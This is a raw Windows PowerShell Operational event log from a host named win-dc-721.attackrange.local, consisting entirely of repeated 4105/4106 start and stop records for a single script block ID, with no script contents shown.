Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471829
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471828
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471827
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471826
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471825
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471824
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471823
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471822
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471821
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471820
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471819
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471818
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471817
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471816
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471815
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471814
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471813
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471812
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471811
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471810
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471809
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471808
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471807
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471806
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471805
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471804
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471803
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471802
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471801
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471800
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471799
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471798
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471797
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471796
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471795
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471794
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471793
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471792
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471791
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471790
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471789
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471788
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471787
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471786
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471785
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471784
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471783
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471782
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471781
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471780
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471779
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471778
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471777
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471776
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
